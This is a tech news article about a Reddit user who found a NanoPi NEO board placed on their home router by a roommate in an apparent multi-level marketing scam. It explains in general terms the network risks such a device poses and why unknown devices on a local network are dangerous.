The Reddit Router Scam

A couple of days ago one Reddit user had the misfortune to return home and discover something rather interesting hooked up to their router…

A couple of days ago one Reddit user had the misfortune to return home and discover something rather interesting hooked up to their router, placed there by their roommate. A cross between a multi-level marking scam and hardware malware, the malicious board had been put into a position that allowed it to harvest every bit of available data from their local network.

“Roommate has come home and stated they found the person on Facebook and installed the device a few days ago. They were told they’d receive $15 a month through direct deposit and all the device will do is run ads for other people when they visit roommates Facebook page…
…well it has been a long night but I’ve finally got all my passwords reset and bank cards cancelled. I have no way of knowing what data was taken as it is not stored on the device. Only thing left to do is grill my roommate for information regarding the person/company that gave them this and decide if I have enough to go to the police.”

Looking at the picture of the board itself, it appears to be an off-the-shelf Friendly ARM NanoPi NEO single-board computer. Built around an Allwinner H3 processor, a quad-core ARM Cortex-A7 running at 1.2GHz with 256MB of RAM, the board has a 10/100Mbps Ethernet jack, and a micro SD card slot. That’s a specification that provides more than enough horse power to snoop in on any traffic going across the local network.

Anyone wondering about the single network cable going into the device—as a “traditional” man-in-the-middle (MitM) attack would require the board to have two ethernet connections, and have the network traffic passing through it—it’s quite possible that, with sufficiently sophisticated configuration, that such a board could intercept all the traffic on the network.

While in this particular instance the device seems—at least on the face of it—to be used to “anonymously” buy Facebook advertising, by placing it inside the local network the room mate has given it access to all the data passing through the local network.

If the board is functioning as a MitM proxy, it is also in a place where it can inject Javascript into any unencrypted web page you’re viewing, as well as harvesting any usernames and passwords passed in the clear. While sensitive data will be somewhat protected by using HTTPS connections, that doesn’t mean that the device is harmless.

Most home routers have serious security vulnerabilities which means that while the device can intercept data, it can also—at least potentially–access your router, and in the worst case flash a new compromised firmware onto it. Afterwards, even if the board itself would have difficulty performing a MitM attack, your now compromised router wouldn’t.

Once compromised your router could also be put into service as part of a distributed denial of service (DDoS) botnet for hire, or even used to mine crypto-currency.

“For anyone wanting final closure on this thing’s origins, roommate said it came from a friend of a friend through Facebook and was shipped to the house (but the packing slip has since been thrown away). Room mate said they were tasked with bringing in more people to the scheme with the promise of more money.
So at face value, it is a tool used to further an multi-level marketing scheme, in actuality, it is taking every bit of data used by the poor fools that fall for this…”

Giving an unknown device access to your local network is serious, as most computers, along with most Internet of Things “smart” devices, will trust the other devices on the local network to be “good actors.” By connecting an unknown device to your local network you’re placing what is a potentially hostile device in a position of implicit trust, and whether you trust it or not yourself is now irrelevant. Because your computers, and other devices, will.

“Roommate is dumb…”

We can only agree?

Alasdair Allan
Scientist, author, hacker, maker, and journalist. Building, breaking, and writing. For hire. You can reach me at 📫 alasdair@babilim.co.uk.
Latest articles
Sponsored articles
Related articles
Latest articles
Read more
Related articles